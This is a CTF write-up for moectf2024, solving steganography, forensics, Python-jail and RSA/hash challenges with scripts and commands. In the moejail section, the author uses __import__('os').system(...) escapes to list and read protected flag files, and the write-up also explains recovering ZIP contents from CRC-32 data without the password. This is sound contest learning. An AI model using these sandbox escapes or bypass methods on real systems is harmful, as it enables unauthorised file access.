moectf2024

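This post was last updated in the early hours of October 13, 2024.

I finished 25th in the individual ranking. I mostly stopped playing in the later stages, so this is a recap and write-up.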

Zero-Basics Introduction (0基础入门)

Read the PDF, enter the identification code in the group chat, and get the flag.

Security Misc

signin

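Open the site and, as instructed, mark luo as absent and sign everyone else in.

Note: complete all the requirements before submitting.

The Legend of Hei (罗小黑战记)

The file turns out to be a GIF with images hidden among its frames; extract them with a tool.

Finally, scanning the code gives moectf{y0uu6r3th3m0st3r1nth1sf13ld}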

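Introductory Guide to Misc (杂项入门指北)

The challenge gives a picture of a seal. I tried several approaches without success, then looked closely at the image itself: it actually contains a stretch of Morse code.

.... ....- ...- . ..--.- .- ..--.- --. ----- ----- -.. ..--.- - .---- -- .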

moectf{H4VE_A_G00D_T1ME}

ez_F5

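This was the first time I had seen this kind of steganography.

The file properties contain an encoded string; Base32-decoding it gives no_password. Opening the file in 010 Editor for analysis shows a hint inside: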

F5

A web search shows this is F5 steganography. Download the tool and use the string above as the password to get the flag.

moectf{F5_15_s0_lntere5t1n9}

so many ‘m’

A character-frequency counting challenge; a script solves it:

from collections import Counter


def char_frequency_sort(text):
    # Count how often each character occurs
    frequency = Counter(text)

    # Sort by frequency, highest first; ties are broken in lexicographic order
    sorted_chars = sorted(frequency.items(), key=lambda x: (-x[1], x[0]))

    # Join the sorted characters into one string
    result = ''.join(char for char, count in sorted_chars)

    return result


# Test input
text = "a!{ivlotzkEm{CtsvEpbDkwexsotyMuECs!mvlhmenrhwpMh0leydsMbC#CC}sii}tkb}ugCD{zlEeT#kyC0fbukglpopmaekbEthmjcMdsgkvmTnC}eot#dcf{ec@ccgqpfqMycysMuuou!en#{g0cDmoyxTCMgt{joT{jnl0rhoklCe{n0CnxprydeaTg0r{avkEjckjEsxhaohs{Trbkr!ffqip444uwrc}nnevgtCT{jCipogtipzdeDiqsy44rMfj{MzCw#qwg{T4m{cuk!hwuncxdmddeurtsojakrjC#vTDd}0poTT@c!DftjwuDp@mcuheeDtfao!iEcEq}kcf#Mpcam{mml4i4mpDnedamcwtC0nem{mDotnmp4jf@TpxfqMoiqwtdijDfimmCzmxe#gsTu{poeTEhD!u0anvTTTbbi{q}zapcksMifDlovoeac@{0keh0dg{Mi!@tfftqitmuMoMcuTpmcgnmozyrrv#zfmzmetyxxa0wczE}eoD{xcMnoCuebu0otdusiDknfvo0{fEsMftzT!eoslegbypspC4vkxm#uaf@acuemhMyiDou#at0rfl4a}0ixeEktws}pMCfCigaTafg}ffssmwwuTkTuls0{M@c4e@{D{tuorzmyqptChpngkeCohCCMTwqctinc0mcjemclv@cMoqf00poarte@oqmuysm#mo{et4kcCpcgcT}vD}m!g4{E0!Mol0fpo!{srT0pf{cMuCx0bp{ftTmExcrn}0etonez!@C4tfa4aM00siztb@fomfD#{#tMbo@jgb4CM0dEk0tea4aMCafn"

# Compute the result and print it
result = char_frequency_sort(text)
print(result)

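Cover One Ear (捂住一只耳)

A WAV file. I first opened it in an audio editor (audi) and saw nothing unusual in the waveform. At around the 1 min mark a series of digits is read out. I only worked it out after reading the hint: each number gives the column and row of a letter on the keyboard, so 63 is the letter in column 6, row 3, i.e. n.

63 31 43 31 41 52 31 51 71 101

The final flag is moectf{nevergetup}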

Abnormal lag

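Opening the file with adu shows content in the spectrogram view; the flag has to be read off by eye. A friendly reminder: the characters are only a-f and digits.

After a few attempts I got moectf{09e3f7f8-c970-4c71-92b0-6f03a677421a}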

moejail_lv1

__import__('os').system('ls -al /tmp')

Read the file:

__import__('os').system('cat /tmp/.therealflag_*')

This gives the flag.

moejail_lv2

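Start by looking around with the same first command as in lv1:

__import__('os').system('ls -al /tmp')

It turns out the file can be read with root privileges:

print(open('/tmp/therealflag_b8c7f31438c67cea772d2ea57dc77918').read())

moejail_lv3

I tried lv3 and the lv2 code works there as well, so I won't go into it further.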

The upside and down

010 Editor shows that the contents are reversed, so write a script:

# Paths on the author's machine
SRC = 'C:/Users/30226/Desktop/a.txt'
DST = 'C:/Users/30226/Desktop/new.txt'

# Read the file contents in binary mode
with open(SRC, 'rb') as f:
    content = f.read()

# Reverse the contents and write them to the new file
reversed_content = content[::-1]
with open(DST, 'wb') as new_file:
    new_file.write(reversed_content)

# Re-read the reversed file as text and drop blank lines
with open(DST, 'r') as file:
    lines = file.readlines()

lines = [line for line in lines if line.strip()]

# Write the filtered contents back to the file
with open(DST, 'w') as file:
    file.writelines(lines)

Scan it to get the flag.

https://balabala_towards:moectf{Fri3nds_d0n't_lie!}//

the_secret_of_snowball

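Open the file in 010 Editor and change the header to FFD8,

which gives the first part.

The second part is at the bottom of the file in 010 Editor; Base64-decode it and join the two parts to get the flag.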

The Never-Ending Archive (解不完的压缩包)

First, write a script to reach the innermost archive:

import os
import zipfile


def extract_zip_file(zip_name, output_dir):
    with zipfile.ZipFile(zip_name, 'r') as zipf:
        zipf.extractall(output_dir)


def main():
    output_dir = "."  # Extract into the current directory
    prev_extracted_file = None
    for i in range(999, 0, -1):
        zip_name = f"{i}.zip"

        if not os.path.exists(zip_name):
            print(f"Error: The file '{zip_name}' does not exist.")
            return

        # Extract the current zip file
        extract_zip_file(zip_name, output_dir)

        if prev_extracted_file:
            # Delete the previously extracted zip file
            os.remove(prev_extracted_file)

        prev_extracted_file = zip_name

    print("All zip files have been extracted and processed.")


if __name__ == "__main__":
    main()

The archive name hints at a CRC collision.

Brute-force it with Zipcrack.py,

which gives the key *m:#P7j0

Finally, decrypt with it to get the flag:

moectf{af9c688e-e0b9-4900-879c-672b44c550ea}
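
The CRC step above works because a ZIP header stores each member's CRC-32 and uncompressed size in the clear, so contents of only a few bytes can be enumerated without the password. The following is an added example, not Zipcrack.py and not code from the original write-up; the sample archive, the 2-byte member size, the candidate alphabet and the helper names are all constructed for illustration.

```python
import io
import itertools
import string
import zipfile
import zlib

# Candidate bytes: printable ASCII without whitespace (an assumption about the contents)
ALPHABET = (string.ascii_letters + string.digits + string.punctuation).encode()


def build_sample_zip(chunks):
    """Constructed stand-in for the challenge archive: one tiny member per chunk.

    zipfile cannot write encrypted members, but a ZipCrypto-encrypted archive
    carries the same CRC-32 and uncompressed-size fields, and those are all the
    recovery step reads.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for index, chunk in enumerate(chunks):
            zf.writestr(f"{index}.txt", chunk)
    return buf.getvalue()


def crc_table(length):
    """Map CRC-32 value -> every candidate plaintext of exactly `length` bytes."""
    table = {}
    for combo in itertools.product(ALPHABET, repeat=length):
        data = bytes(combo)
        table.setdefault(zlib.crc32(data), []).append(data)
    return table


def recover_small_members(zip_bytes, max_len=2):
    """Return {member name: candidate contents} using header metadata only.

    Members longer than max_len map to None: the search space grows as
    len(ALPHABET) ** size, and CRC-32 is no longer guaranteed unique past 4 bytes.
    """
    tables = {}
    recovered = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            size = info.file_size
            if not 0 < size <= max_len:
                recovered[info.filename] = None
                continue
            if size not in tables:
                tables[size] = crc_table(size)
            # The member data itself is never read, only its stored CRC-32
            recovered[info.filename] = tables[size].get(info.CRC, [])
    return recovered


def join_unique(recovered, names):
    """Concatenate the members in order if each has exactly one candidate."""
    parts = []
    for name in names:
        candidates = recovered.get(name)
        if not candidates or len(candidates) != 1:
            return None
        parts.append(candidates[0])
    return b"".join(parts)


if __name__ == "__main__":
    sample = build_sample_zip([b"k3", b"Y!", b"de", b"mo"])  # constructed data
    found = recover_small_members(sample)
    print(found)
    print(join_unique(found, ["0.txt", "1.txt", "2.txt", "3.txt"]))
```

Packing tiny files into one larger inner archive before encrypting removes this leak, because the per-file CRC-32 values are then no longer visible in the outer headers.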

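At Least 300 Copies Each (每人至少300份)

I kept thinking about writing a script and did not look at the images; in the end I simply stitched them together in a Word document. Scanning the resulting code gives a string of characters, and after some analysis I found it was Base58-encoded, which gave the flag. A fixed version of this challenge comes later.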

balabalballablblablbalablbalballbase58lblblblblllblblblblbalblbdjshjshduieyrfdrpieuufghdjhgfjhdsgfsjhdgfhjdsghjgfdshjgfhjdgfhgdh///key{3FgQG9ZFteHzw7W42}??

Decode the contents of key{...} to get the flag.

readme

/proc/self/fd/3

Find It

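orz, this one took me a long time. In short, it has little to do with the image; just read the hint.

Solving process: ask Doubao for kindergartens in Xi'an with "的" in their name, which turns up 吉的堡幼儿园 (Ji Di Bao Kindergarten). A quick Baidu Maps search of a few locations shows one residential compound with two Ji Di Bao kindergartens, so the final answer, spelled in pinyin, is moectf{ji_di_bao_you_er_yuan}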

ez_Forensics

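I have not really looked into forensics before.

Just run the usual commands in order (this one is fairly simple, after all).

Drag the image into a virtual machine and use vol (Volatility).

As usual, start by checking what kind of image it is:

vol.py -f ../flag.raw imageinfo

Once the image profile is known, list the processes:

vol.py -f ../flag.raw --profile=Win7SP1x64 pslist

cmd.exe stands out; according to the challenge hint, we need the flag from inside cmd.

Run cmdscan:

vol.py -f ../flag.raw --profile=Win7SP1x64 cmdscan

This yields the flag: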

CommandProcess: conhost.exe Pid: 2268
CommandHistory: 0x32b0a0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x330410: echo moectf{WWBGY-TLVC5-XKYBZ} > flag.txt
Cmd #1 @ 0x30cec0: echo SJW7O^%gt8 > flag.txt
Cmd #2 @ 0x3350b0: del flag.txt
**************************************************

ctfer2077①

Scanning it first turns up nothing. Looking at it with steg shows a string of content in one place; analyzing the data gives the flag.

moectf{84d7f247-3cba-4077-ba25-079f3ac7bb8a}

ctfer2077②

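Decrypt the encrypted volume with VeraCrypt, then use DiskGenius to recover files, which yields some content. Opening it shows nothing obvious; something was probably deleted, so recover it. There is a file named 小鹤.txt whose contents are: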

ulpb vfde hfyz yisi buuima
key jqui xxmm vedrhx de qrpb xnxp
ulpb ui veyh dazide

Analysis shows the text was typed with Shuangpin (double pinyin); decoding it gives the key:

shuangpinshizheyangdazide

Wrap it in moectf and that is the flag.

ctfer2077③

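Export the objects from the packet capture, then run foremost on the upload file to carve out an archive; extracting it gives several files.

One animated GIF has faintly visible text; extracting it gives key:C5EZFsC6

Opening the audio normally with aud shows nothing, but note that it is an MP3 file, so try decoding it with MP3Stego.

This produces a file containing Brainfuck; converting it to text gives the string H5gHWM9b

Extracting the archive gives three txt files; zoomed out, they show the Sherlock Holmes dancing men.

[Image: the dancing men]

Match each figure to its letter in turn and you get the following string; finally wrap it in moectf{}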

people_dancing_happily

Modern Cryptography

Introductory Guide to Modern Cryptography (现代密码学入门指北)

Write a script based on the given text:

from Crypto.Util.number import long_to_bytes, inverse

# Given parameters
p = 197380555956482914197022424175976066223
q = 205695522197318297682903544013139543071
n = 40600296529065757616876034307502386207424439675894291036278463517602256790833
e = 65537
c = 36450632910287169149899281952743051320560762944710752155402435752196566406306

# Compute φ(n)
phi = (p - 1) * (q - 1)

# Compute the decryption exponent d
d = inverse(e, phi)

# Decrypt ciphertext c to get plaintext m
m = pow(c, d, n)

# Convert plaintext m to bytes
flag = long_to_bytes(m)

# Print the decrypted result
print(flag.decode())

Signin

from Crypto.Util.number import inverse, long_to_bytes, GCD
from sympy import symbols, solve

# Define the known values first
c = 5654386228732582062836480859915557858019553457231956237167652323191768422394980061906028416785155458721240012614551996577092521454960121688179565370052222983096211611352630963027300416387011219744891121506834201808533675072141450111382372702075488292867077512403293072053681315714857246273046785264966933854754543533442866929316042885151966997466549713023923528666038905359773392516627983694351534177829247262148749867874156066768643169675380054673701641774814655290118723774060082161615682005335103074445205806731112430609256580951996554318845128022415956933291151825345962528562570998777860222407032989708801549746
pq = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687154230787854196153067547938936776488741864214499155892870610823979739278296501074632962069426593691194105670021035337609896886690049677222778251559566664735419100459953672218523709852732976706321086266274840999100037702428847290063111455101343033924136386513077951516363739936487970952511422443500922412450462
qp = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687077087914198877794354459669808240133383828356379423767736753506794441545506312066344576298453957064590180141648690226266236642320508613544047037110363523129966437840660693885863331837516125853621802358973786440314619135781324447765480391038912783714312479080029167695447650048419230865326299964671353746764860
n = 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687534959910892789661065614807265825078942931717855566686073463382398417205648946713373617006449901977718981043020664616841303517708207413215548110294271101267236070252015782044263961319221848136717220979435486850254298686692230935985442120369913666939804135884857831857184001072678312992442792825575636200505903
p_q = 279533706577501791569740668595544511920056954944184570513187478007551195831693428589898548339751066551225424790534556602157835468618845221423643972870671556362200734472399328046960316064864571163851111207448753697980178391430044714097464866523838747053135392202848167518870720149808055682621080992998747265496
e = 65537

# Recover p and q as the roots of x^2 - p_q*x + n = 0 (p_q is used as p + q)
x = symbols('x')
equation = x**2 - p_q*x + n
solutions = solve(equation, x)
p = int(solutions[0])
q = int(solutions[1])

# Compute φ(n)
phi_n = (p - 1) * (q - 1)

# Compute the private exponent d
d = inverse(e, phi_n)

# Decrypt the message
m = pow(c, d, n)
flag = long_to_bytes(m)

print(f"Recovered flag: {flag.decode()}")

Big and small

from Crypto.Util.number import long_to_bytes
import gmpy2

# Given c, e, n
c = 150409620528288093947185249913242033500530715593845912018225648212915478065982806112747164334970339684262757
e = 3
n = 20279309983698966932589436610174513524888616098014944133902125993694471293062261713076591251054086174169670848598415548609375570643330808663804049384020949389856831520202461767497906977295453545771698220639545101966866003886108320987081153619862170206953817850993602202650467676163476075276351519648193219850062278314841385459627485588891326899019745457679891867632849975694274064320723175687748633644074614068978098629566677125696150343248924059801632081514235975357906763251498042129457546586971828204136347260818828746304688911632041538714834683709493303900837361850396599138626509382069186433843547745480160634787

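# Use the integer root function provided by gmpy2 to take the cube root
m, exact = gmpy2.iroot(c, e)

# If the cube root is exact, the plaintext can be read off directly
if exact:
    flag = long_to_bytes(m)
    print(flag)
else:
    # Message: "the ciphertext may not be directly decryptable, or the cube root is not exact"
    print("密文可能无法直接解密,或者立方根不精确。")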

ez_hash

The hint is that the secret is a QQ number, so it consists only of digits; just brute-force it:

from hashlib import sha256
# Given hash value
target_hash = '3a5137149f705e4da1bf6742e62c018e3f7a1784ceebcb0030656a2b42f50b6a'
# Known prefix of the secret
prefix = b'2100'
# Brute-force the remaining digits of the secret
for i in range(1000000):  # from 000000 to 999999
    # Format as 6 digits, zero-padded on the left
    suffix = f'{i:06}'.encode()
    secrets = prefix + suffix
    # Compute the SHA-256 hash
    hash_value = sha256(secrets).hexdigest()
    # Check whether the hash matches
    if hash_value == target_hash:
        print(f"Found secrets: {secrets.decode()}")
        break

baby_equation

First, simplify this:
$$
(a^2 + 1)(b^2 + 1) - 2(a - b)(ab - 1) = 4(k + ab)
$$

$$
(a+1)^2(b-1)^2=4k
$$
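
The step between the two equations, written out as an added derivation (not part of the original write-up): expand the left-hand side, move $4ab$ across, and factor.

$$
\begin{aligned}
(a^2+1)(b^2+1) - 2(a-b)(ab-1) &= a^2b^2 + a^2 + b^2 + 1 - 2a^2b + 2ab^2 + 2a - 2b \\
4k &= a^2b^2 - 2a^2b + 2ab^2 + a^2 - 4ab + b^2 + 2a - 2b + 1 \\
&= (a^2 + 2a + 1)(b^2 - 2b + 1) \\
&= (a+1)^2 (b-1)^2
\end{aligned}
$$

For the positive integers the script looks for, this gives $(a+1)(b-1) = \sqrt{4k}$, which is why the script takes the integer square root of $4k$ and splits its factors between $a+1$ and $b-1$.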

Then a and b still have to be found:

import gmpy2
from Crypto.Util.number import long_to_bytes


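def find(tot, index, ls):
    """
    Recursive search for a combination of factors whose product decodes to the flag.
    :param tot: the current product (initially 1).
    :param index: index of the factor currently being considered.
    :param ls: list of all candidate factors.
    :return: the product that satisfies the condition, or 0 if none is found.
    """
    # Base case: every factor has been considered
    if index == len(ls):
        # Check whether the current product contains the flag marker 'moectf{'
        if b'moectf{' in long_to_bytes(tot):
            return tot  # found it
        return 0  # not found

    # Recurse with the current factor included
    a = find(tot * ls[index], index + 1, ls)
    # Recurse with the current factor excluded
    b = find(tot, index + 1, ls)

    # Return whichever result is non-zero
    return a if a != 0 else b


# The given constant k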
k = 0x2227e398fc6ffcf5159863a345df85ba50d6845f8c06747769fee78f598e7cb1bcf875fb9e5a69ddd39da950f21cb49581c3487c29b7c61da0f584c32ea21ce1edda7f09a6e4c3ae3b4c8c12002bb2dfd0951037d3773a216e209900e51c7d78a0066aa9a387b068acbd4fb3168e915f306ba40

# a1b1 = sqrt(4 * k) = (a + 1) * (b - 1)
a1b1 = gmpy2.iroot(4 * k, 2)[0]

# Factor list from which the candidate products are built
fac = [
    2, 2, 2, 2, 3, 3, 31, 61, 223, 4013, 281317, 4151351, 339386329, 370523737,
    5404604441993, 26798471753993, 25866088332911027256931479223,
    64889106213996537255229963986303510188999911
]

# Recursively search the factor combinations to get a1 = a + 1
a1 = find(1, 0, fac)

# b1 = a1b1 // a1 = b - 1
b1 = a1b1 // a1

# Convert a = a1 - 1 and b = b1 + 1 to bytes and print the flag
print(long_to_bytes(a1 - 1) + long_to_bytes(b1 + 1))

new_system

import gmpy2
from Crypto.Util.number import long_to_bytes

# Given values
a1, c1 = [48152794364522745851371693618734308982941622286593286738834529420565211572487, 21052760152946883017126800753094180159601684210961525956716021776156447417961]
a2, c2 = [48649737427609115586886970515713274413023152700099032993736004585718157300141, 6060718815088072976566240336428486321776540407635735983986746493811330309844]
a, c = [30099883325957937700435284907440664781247503171217717818782838808179889651361, 85333708281128255260940125642017184300901184334842582132090488518099650581761]
q = 105482865285555225519947662900872028851795846950902311343782163147659668129411

b = (c - c1 - c2) % q
d = (a - a1 - a2) % q

assert b > 0
assert d > 0
assert gmpy2.gcd(d, q) == 1
inv_d = gmpy2.invert(d, q)
x = (b * inv_d) % q
print(f"The value of x is: {x}")

gift = (c - a * x) % q
print(long_to_bytes(gift))

RSA_revenge

from Crypto.Util.number import long_to_bytes
import gmpy2

# Given values
n = 141326884939079067429645084585831428717383389026212274986490638181168709713585245213459139281395768330637635670530286514361666351728405851224861268366256203851725349214834643460959210675733248662738509224865058748116797242931605149244469367508052164539306170883496415576116236739853057847265650027628600443901
c = 47886145637416465474967586561554275347396273686722042112754589742652411190694422563845157055397690806283389102421131949492150512820301748529122456307491407924640312270962219946993529007414812671985960186335307490596107298906467618684990500775058344576523751336171093010950665199612378376864378029545530793597
e = 65537

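# Brute-force search for p and q. The construction below makes b the 512-bit
# reversal of a: bit k of a equals bit (511 - k) of b, and vice versa.
def brute_force(a, b, k):
    if k == 256:
        if a * b == n:
            print(f'找到因子: a={a}, b={b}')  # "factors found"
            return a, b
        return 0

    for i in range(2):
        for j in range(2):
            a1 = a + i * (2 ** (511 - k)) + j * (2 ** k)
            b1 = b + j * (2 ** (511 - k)) + i * (2 ** k)

            # Prune: already too large with the undecided bits at 0
            if a1 * b1 > n:
                continue

            # Prune: still too small with the undecided bits at their maximum
            if (a1 + 2 ** (511 - k)) * ((b1 + 2 ** (511 - k))) < n:
                continue

            # Prune: the low k + 1 bits of the product must match n
            if (a1 * b1) % (2 ** (k + 1)) != n % (2 ** (k + 1)):
                continue

            result = brute_force(a1, b1, k + 1)
            if result:
                return result

    return 0

# Call the brute-force function to find p and q
p, q = brute_force(0, 0, 0)

# RSA decryption function
def decrypt_rsa(p, q, c, e):
    # Compute the modulus n and Euler's totient (phi)
    n = p * q
    phi = (p - 1) * (q - 1)

    # Compute the private exponent d
    d = gmpy2.invert(e, phi)

    # Decrypt the ciphertext with the private key
    m = pow(c, d, n)
    return long_to_bytes(m)

# Decrypt and print the result ("decrypted plaintext")
plaintext = decrypt_rsa(p, q, c, e)
print(f'解密后的明文: {plaintext.decode()}')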

ezlegendre

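For each number n in the ciphertext, we compute the Legendre symbol (n-a | p).

If the Legendre symbol is 1, the corresponding original bit is 1; otherwise it is 0.

We concatenate all the decrypted bits into one binary string.

Finally, we convert the binary string to ASCII characters 8 bits at a time to obtain the final plaintext.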

from sympy import legendre_symbol


def decrypt_flag(ciphertext, p, a):
    plaintext = ""
    # (a|p) is the same for every ciphertext value, so compute it once
    leg_a = legendre_symbol(a, p)
    for n in ciphertext:
        # Compute the Legendre symbol (n|p) and compare it with (a|p)
        leg_n = legendre_symbol(n, p)

        # If (n|p) == (a|p) the original bit is 0, otherwise it is 1
        bit = '0' if leg_n == leg_a else '1'
        plaintext += bit

    # Convert the binary string to ASCII characters, 8 bits at a time
    flag = ''
    for i in range(0, len(plaintext), 8):
        byte = plaintext[i:i + 8]
        flag += chr(int(byte, 2))

    return flag


# Given parameters
p = 303597842163255391032954159827039706827
a = 34032839867482535877794289018590990371

# Ciphertext taken from the given output
ciphertext = [278121435714344315140568219459348432240, 122382422611852957172920716982592319058, 191849618185577692976529819600455462899, 94093446512724714011050732403953711672, 201558180013426239467911190374373975458, 68492033218601874497788216187574770779, 126947642955989000352009944664122898350, 219437945679126072290321638679586528971, 10408701004947909240690738287845627083, 219535988722666848383982192122753961, 173567637131203826362373646044183699942, 80338874032631996985988465309690317981, 61648326003245372053550369002454592176, 277054378705807456129952597025123788853, 17470857904503332214835106820566514388, 107319431827283329450772973114594535432, 238441423134995169136195506348909981918, 99883768658373018345315220015462465736, 188411315575174906660227928060309276647, 295943321241733900048293164549062087749, 262338278682686249081320491433984960912, 22801563060010960126532333242621361398, 36078000835066266368898887303720772866, 247425961449456125528957438120145449797, 843438089399946244829648514213686381, 134335534828960937622820717215822744145, 74167533116771086420478022805099354924, 249545124784428362766858349552876226287, 37282715721530125580150140869828301122, 196898478251078084893324399909636605522, 238696815190757698227115893728186526132, 299823696269712032566096751491934189084, 36767842703053676220422513310147909442, 281632109692842887259013724387076511623, 205224361514529735350420756653899454354, 129596988754151892987950536398173236050, 97446545236373291551224026108880226180, 14756086145599449889630210375543256004, 286168982698537894139229515711563677530, 100213185917356165383902831965625948491, 268158998117979449824644211372962370753, 264445941122079798432485452672458533870, 87798213581165493463875527911737074678, 131092115794704283915645135973964447801, 164706020771920540681638256590936188046, 178911145710348095185845690896985420147, 154776411353263771717768237918437437524, 260700611701259748940616668959555019434, 
222035631087536380654643071679210307962, 281292430628313502184158157303993732703, 24585161817233257375093541076165757776, 269816384363209013058085915818661743171, 39975571110634682056180877801094873602, 125235869385356820424712474803526156473, 218090799597950517977618266111343968738, 144927096680470512196610409630841999788, 213811208492716237073777701143156745108, 64650890972496600196147221913475681291, 302694535366090904732833802133573214043, 214939649183312746702067838266793720455, 219122905927283854730628133811860801459, 224882607595640234803004206355378578645, 260797062521664439666117613111279885285, 279805661574982797810336125346375782066, 147173814739967617543091047462951522968, 23908277835281045050455945166237585493, 186338363482466926309454195056482648936, 295140548360506354817984847059061185817, 151948366859968493761034274719548683660, 96829048650546562162402357888582895187, 61129603762762161772506800496463804206, 83474322431616849774020088719454672415, 25094865151197136947956010155927090038, 86284568910378075382309315924388555908, 269311313874077441782483719283243368999, 293865655623484061732669067594899514872, 42618744258317592068586041005421369378, 54330626035773013687614797098120791595, 147903584483139198945881545544727290390, 290219451327796902155034830296135328101, 147951591390019765447087623264411247959, 176721307425594106045985172455880551666, 10617017342351249793850566048327751981, 166002147246002788729535202156354835048, 43653265786517886972591512103899543742, 191250321143079662898769478274249620839, 142288830015965036385306900781029447609, 231943053864301712428957240550789860578, 259705854206260213018172677443232515015, 42547692646223561211915772930251024103, 210863755365631055277867177762462471179, 140297326776889591830655052829600610449, 136970598261461830690726521708413303997, 93221970399798040564077738881047391445, 192314170920206027886439562261321846026, 95904582457122325051140875987053990027, 158334009503860664724416914265160737388, 
134039922705083767606698907224295596883, 7789601161004867293103537392246577269, 261069289329878459425835380641261840913, 123743427894205417735664872035238090896, 20126583572929979071576315733108811761, 5317214299018099740195727361345674110, 68965882674411789667953455991785095270, 235934145208367401015357242228361016868, 250709310980093244562698210062174570956, 167048130489822745377277729681835553856, 122439593796334321806299678109589886368, 117953800124952553873241816859976377866, 226311466875372429157352019491582796620, 301401080214561977683439914412806833619, 255816105091394723475431389696875064495, 73243049441397892506665249226961409560, 226985189100195407227032930008331832009, 164462051705780513134747720427967016844, 97905180778488273557095248936896399883, 40737879120410802220891174679005117779, 180413920169781019749877067396006212488, 171309368917976988181007951396904157090, 215065878665354148046787050342635722874, 54225964222741166664978354789209176721, 179980445108969868669560591527220171967, 39118880593034932654127449293138635964, 170210538859699997092506207353260760212, 62152643864232748107111075535730424573, 28285579676042878568229909932560645217, 69823876778445954036922428013285910904, 170371231064701443428318684885998283021, 211884923965526285445904695039560930451, 2912793651373467597058997684762696593, 220544861190999177045275484705781090327, 142755270297166955179253470066788794096, 264271123927382232040584192781810655563, 214901195876112453126242978678182365781, 252916600207311996808457367909175218824, 176399700725319294248909617737135018444, 230677646264271256129104604724615560658, 1568101696521094800575010545520002520, 276644650735844694794889591823343917140, 185355461344975191330786362319126511681, 248497269558037476989199286642120676823, 27426372552503547932146407600438894266, 99885839446999373024614710052031031159, 238693364649026611386487480573211208980, 27047849084544903200283111147329657123, 261687609401872239323715016608713989139, 
34926503987070847956303036393611830590, 252495954285655595492775877967398282722, 249358827602419141539353237669905281246, 42551212101869966935955269842854722856, 286527336123436427709115043975536071462, 158097411156207320921055042509886995091, 40982984899524424348979403377331335675, 87268254405858939730919659372073314983, 142920872841164853694746048293715385493, 280344634952903421792629929689092857993, 203584314487374069738101729666435007339, 76747904284507590577908045394001414841, 18608573158088521401404614102481693137, 104158289118605398449367221892619783009, 182616719368573751169836443225324741716, 272025723760783252166092979911587562064, 24194069309604403496494752448487752613, 71973842397785917741048132725314885345, 281558046604363121112749722271741416764, 66965324704079734796576428718112513855, 105222756356650324548621319241035836840, 331654051401420900830576011369146182, 131087815164777263900650262777429797113, 76104729920151139813274463849368737612, 163253554841934325278065946152769269296, 35973933431510942249046321254376084104, 223355354158871484030430212060934655984, 181704973473887713398031933516341967465, 131391458395622565487686089688656869743, 153029062510158353978320224242258979076, 75598349867958834632866616947240059419, 107656133091853571710502064573530657194, 261653899003034450454605322537555204702, 102387069931966536076616272953425585051, 174654548539988861301269811985320013260, 30731762585661721683653192240732246059, 265493340795853624586170054917042208660, 174818040730242275465453007894471517233, 99514915046145707535310601810631334278, 133978892607644700903700803642408771370, 216019770199630171637325931783378096100, 76687884966028369399497157007109898467, 262185741950606001987209986574269562289, 101935410844521914696784339882721918198, 85956270718878931834010975962772401589, 117578315837774870077915813512746446219, 209811226703488479967593762805568394383, 85782228978690599612110880989543246041, 234993402267259336147096170367513324439, 
158487299348452041021565296682698871789, 159701431055714867184644360639841355076, 109022557288733938098734847159477770521, 20764822884655633017647117775843651332, 144987524936939260617020678038224835887, 214906746504968333094519539609226540495, 61852186870193663367998110214331582115, 90175894032076080713807606548780168998, 283504071501037047650569090140982777586, 267695305479884628857258564337611106120, 2466175482923380874813569827625743835, 62561740902965346823256447383892272796, 181458673990444296212252831090106274182, 151903421483215372136947284355251617709, 19545903652854510304023406921387221130, 219205004027218279279153442572018305650, 62495663621315535552427938857863551873, 12365469869484359722316573851483855865, 84444120685499458796249283893323932282, 240719245204462516267560756675192129462, 27868242791206675092288978266113368469, 231956104988320170956546781095814860314, 238410591787987745803829175586952288627, 290649141309468101840354611586699479851, 288298044918505512172272603794059992911, 43375655853069820305921366762777897508, 195308577786654489057887409352840304641, 184459971400898842809886506207633536394, 255884612697066296714973816950917234211, 8695922085804648269560669225439485137, 109407350389195091443836128149623969417, 40151058765649465408124869078260007620, 125484946058191366826510549493690011718, 71132588066103752922321942940739808864, 74434669478187680319595294456652807097, 187368213679294937718535073296853726111, 63461505676143678393259420949793811831, 131619805472714703711458729455838994067, 8579657158619864010437706463902003097, 60626278761876782233388469543817973673, 44776499706241603722632560896220653186, 257249861781237389988455384617803171877, 161899873165011719282095749671993720527, 73303482092538159761390536102771615311, 141674253732456103774983358188317473860, 112299149158347774069079224861237069975, 192409969047313867540459549167233638120, 52560717143548208264188844553309600513, 209294007943747095607573416682772182613, 
65285862009539442533024037477398617382, 141465096635701758351979378177631042196, 282970656853503001128091562858564344839, 50475483578642585644452991078499278745, 162546597698227455939743094437394415689, 65258447920153625609456176138520078583, 25184730952052088803921023041299838584, 228883100940853988548836641050823478387, 234342509561041384559923481191578502671, 96929129863331626375704681481278825323, 288533470498072097357398960101692503873, 202238020435442160571930572760188491021, 179010548891454398845389500871076122861, 210509821764943794358893224681677583929, 301357944197101288505771002301759006254, 188933290023352627523422420332593360537, 207946655777875200521742190622482472884, 288626263488145443150622420747070805416, 75616301779108425588545170038742534166, 58163857263381687168244101022135667109, 297006021514663344215599115965804102114, 297690420826548736122127126645053452341, 88307045391242971429880119414942510712, 186427606153958359494215188169120285788, 135488686276533521058776859854524444361, 185380054960856211260651416683468161990, 175033658667416561573078028845860911744, 223026004671602541191897755812121342354, 34657268786986063209312902409995458857, 120560332690000675303295481174067849230, 55304621833927249516093996383526467671, 111480233798478730015825495041130765708, 188996716801525995463705449722399676888, 276300230605454487705048192796463035731, 195951365841304132244984630163178946841, 97383655947416522972353051984313703380, 94486945760999630041197414137963583839, 180706938513681126017333618518691884990, 291355503207799224380050183085704824037, 69034413486375685936282884707402207337, 147750870458026934714106830614187010708, 45030500748522416863096615057804736553, 242760053973560804002707125041520857401, 78549841097746795170488790352479728712, 2356186555504071026416878904180857750, 250486437623828232647064146324392061051, 23443836455198610186212360005846025976, 